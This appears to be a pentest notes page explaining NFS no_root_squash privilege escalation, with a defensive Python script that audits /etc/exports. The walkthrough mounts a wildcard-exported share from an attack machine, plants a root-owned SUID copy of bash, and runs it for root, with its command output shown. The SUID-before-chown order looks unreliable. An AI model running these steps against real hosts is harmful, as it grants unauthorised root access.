0xPThree.gitbook.io

NFS - N/A

no_root_squash privilege escalation (remote)

By default, an NFS server maps requests from the root user (uid 0) on a client to the unprivileged user nfsnobody; root's privileges are "squashed". When no_root_squash is configured, requests are not squashed, meaning any client that mounts this directory can read, write and modify files within it as root on the host machine.

This is the remote version of this privilege escalation: no explicit host is configured in /etc/exports, so all (*) hosts are allowed to mount the NFS share.
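To find this misconfiguration before someone else does, an exports file can be checked for exactly the combination above: no_root_squash together with a wildcard host and rw. The following audit script is an added example, not part of the original page; the sample exports content is constructed, with its first line mirroring the export shown here.

```python
import re
from typing import NamedTuple

# Constructed sample of /etc/exports; the first entry mirrors the one on this page.
SAMPLE_EXPORTS = """\
/share/nfs\t*(rw,insecure,sync,no_subtree_check,no_root_squash)
/srv/backup 10.0.0.0/24(rw,sync,root_squash) 10.0.0.5(rw,no_root_squash)
/srv/public *(ro,all_squash)   # everyone mapped to the anonymous user
/srv/legacy *
"""

class Finding(NamedTuple):
    path: str
    host: str
    options: tuple
    reasons: tuple

def parse_exports(text):
    """Return (path, host, options) per client entry, following exports(5):
    'path host(opts) host(opts) ...'; a bare host keeps the defaults, and
    '(opts)' separated from the host by a space applies to every host."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:       # a lone path is exported to all
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", client)
            host = (m.group(1) if m else client) or "*"
            opts = tuple(o for o in ((m and m.group(2)) or "").split(",") if o)
            entries.append((path, host, opts))
    return entries

def audit_exports(text):
    """Flag entries where root is not squashed; exportfs defaults to root_squash."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "no_root_squash" not in opts:
            continue
        reasons = ["no_root_squash"]
        if host == "*":
            reasons.append("wildcard host")   # any client may mount it
        if "rw" in opts:
            reasons.append("rw")              # files can be written as root
        if "insecure" in opts:
            reasons.append("insecure")        # unprivileged source ports accepted
        findings.append(Finding(path, host, opts, tuple(reasons)))
    return findings
```

Running audit_exports over the sample reports /share/nfs (wildcard host, rw, insecure) and the 10.0.0.5 entry of /srv/backup, while entries that rely on the root_squash default are left alone.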

## Confirm that 'no_root_squash' is configured
[lowPrivUser@victimHost nfs]$ cat /etc/exports
/share/nfs	*(rw,insecure,sync,no_subtree_check,no_root_squash)

## Low privileged account isn't able to read nfs directory
[lowPrivUser@victimHost share]$ ls -al
drwxr-xr-x   7 root     root        75 Jun 23 08:56 .
dr-xr-xr-x. 20 root     root       278 Aug 25  2022 ..
drwxr-x---   2 admUser  admUser    189 Feb 19  2021 nfs

## Mount share from local attack machine
➜  /tmp mkdir pe
➜  /tmp mount -t nfs victimHost:/share/nfs /tmp/pe
➜  /tmp cd pe
➜  pe ls -al 
total 5684
drwxr-x---  2 void void     189 Feb 19  2021 .
drwxrwxrwt 21 root root   69632 Jul  3 12:49 ..
-rw-r--r--  1 void void     823 Feb 19  2021 secret.conf

## Change privileges of mounted share so lowPrivUser can copy /bin/bash to share
➜  /tmp chmod 777 pe

[lowPrivUser@victimHost share]$ cd nfs
[lowPrivUser@victimHost nfs]$ cp /bin/bash .

## Change owner and set SUID bit on binary. Execute on victimHost to privesc
➜  pe chmod +s bash
➜  pe chown root:root bash

[lowPrivUser@victimHost nfs]$ ./bash -p
bash-4.4# id
uid=1651499380(lowPrivUser) gid=1102800513(domain users) euid=0(root) egid=0(root) groups=0(root)

## Cleaning
➜  pe rm bash
➜  pe cd ..
➜  /tmp chmod 750 pe
💀➜  /tmp umount pe

Last updated 10 months ago